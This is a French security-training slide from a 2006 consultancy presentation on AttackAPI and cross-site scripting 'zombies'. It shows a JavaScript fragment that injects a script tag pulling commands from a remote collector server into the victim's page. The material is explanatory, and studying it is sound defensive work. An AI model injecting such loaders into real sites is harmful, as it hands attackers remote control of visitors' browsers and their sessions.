 |
|
| AttackAPI et le Cross-Site Scripting Zombie et Collecteur |
| |
 |
Création d'un élément de type script
|
| |
var script = document.createElement('script');
|
| |
script.type = 'text/javascript';
|
| |
Récupération du script sur le collecteur
|
| |
script.src = channel.location +
|
| |
|
| |
'?action=pull&callback=
|
| |
|
| |
ZombieAPI.Channel.channels.channel' +
|
| |
|
| |
channel.index +
'.callbacks.pull';
|
| |
Ajout à la page courante
|
| | document.body.appendChild(script); |
(C) B & A Consultants 2006 - Reproduction interdite - Pierre-Yves Bonnetain
| B&A Consultants | Prestations et compétences | Documents techniques | Présentations | Formations | Groupes de travail | Médias et conférences | Pour nous contacter |
| (C) B&A Consultants 1996-2009 - infos[AT]ba-cst.com - +33 (0) 563 277 241 |